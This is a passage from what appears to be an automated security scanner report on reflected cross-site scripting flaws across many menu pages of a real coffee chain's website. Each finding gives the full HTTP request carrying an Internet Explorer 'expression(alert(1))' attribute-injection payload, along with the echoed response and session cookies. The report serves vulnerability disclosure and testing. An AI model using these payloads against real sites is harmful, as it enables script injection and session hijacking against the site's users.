GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:13 GMT
Connection: close
Content-Length: 45272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style="x:expression(alert(1))"69f7e0c5087=1"/>
...[SNIP]...

1.782. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf9f7"style="x:expression(alert(1))"70fdedd5bf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style="x:expression(alert(1))"70fdedd5bf5=1"/>
...[SNIP]...

1.783. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/caramel-apple-spice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb864"style%3d"x%3aexpression(alert(1))"66df403bea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb864"style="x:expression(alert(1))"66df403bea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style%3d"x%3aexpression(alert(1))"66df403bea2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:34 GMT
Connection: close
Content-Length: 41154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style="x:expression(alert(1))"66df403bea2=1"/>
...[SNIP]...

1.784. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/cold-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 563c7"style="x:expression(alert(1))"b209836fbc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:36 GMT
Connection: close
Content-Length: 40523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style="x:expression(alert(1))"b209836fbc5=1"/>
...[SNIP]...

1.785. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ee49"style="x:expression(alert(1))"6f89d6acc18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:25 GMT
Connection: close
Content-Length: 41188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style="x:expression(alert(1))"6f89d6acc18=1"/>
...[SNIP]...

1.786. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28684"style="x:expression(alert(1))"1f8573fecb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/milk?28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:11 GMT
Connection: close
Content-Length: 40785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk?28684"style="x:expression(alert(1))"1f8573fecb9=1"/>
...[SNIP]...

1.787. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/steamed-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39769"style%3d"x%3aexpression(alert(1))"720efc59f16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39769"style="x:expression(alert(1))"720efc59f16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style%3d"x%3aexpression(alert(1))"720efc59f16=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:10 GMT
Connection: close
Content-Length: 40599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style="x:expression(alert(1))"720efc59f16=1"/>
...[SNIP]...

1.788. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"style%3d"x%3aexpression(alert(1))"47495068b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f97"style="x:expression(alert(1))"47495068b64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake?92f97"style%3d"x%3aexpression(alert(1))"47495068b64=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:01 GMT
Connection: close
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake?92f97"style="x:expression(alert(1))"47495068b64=1"/>
...[SNIP]...

1.789. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e510"style="x:expression(alert(1))"35729b21c4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake-tea-latte?9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:00 GMT
Connection: close
Content-Length: 42264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte?9e510"style="x:expression(alert(1))"35729b21c4d=1"/>
...[SNIP]...

1.790. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/black-shaken-iced-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f45fc"style="x:expression(alert(1))"a995444f9d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:40 GMT
Connection: close
Content-Length: 42142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style="x:expression(alert(1))"a995444f9d1=1"/>
...[SNIP]...

1.791. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/calm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d301f"style="x:expression(alert(1))"615fe6659bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/calm?d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:24 GMT
Connection: close
Content-Length: 42122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/calm?d301f"style="x:expression(alert(1))"615fe6659bf=1"/>
...[SNIP]...

1.792. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/chai-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fa3"style="x:expression(alert(1))"8b53a955b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/chai-latte?d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:19 GMT
Connection: close
Content-Length: 42396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte?d1fa3"style="x:expression(alert(1))"8b53a955b6c=1"/>
...[SNIP]...

1.793. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/china-green-tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122aa"style="x:expression(alert(1))"99a1446dfba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/china-green-tips?122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:32 GMT
Connection: close
Content-Length: 42109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips?122aa"style="x:expression(alert(1))"99a1446dfba=1"/>
...[SNIP]...

1.794. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a03d"style="x:expression(alert(1))"28dfe317897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey?4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:22 GMT
Connection: close
Content-Length: 42144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey?4a03d"style="x:expression(alert(1))"28dfe317897=1"/>
...[SNIP]...

1.795. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949d1"style="x:expression(alert(1))"6eaf867621e in the application's response.

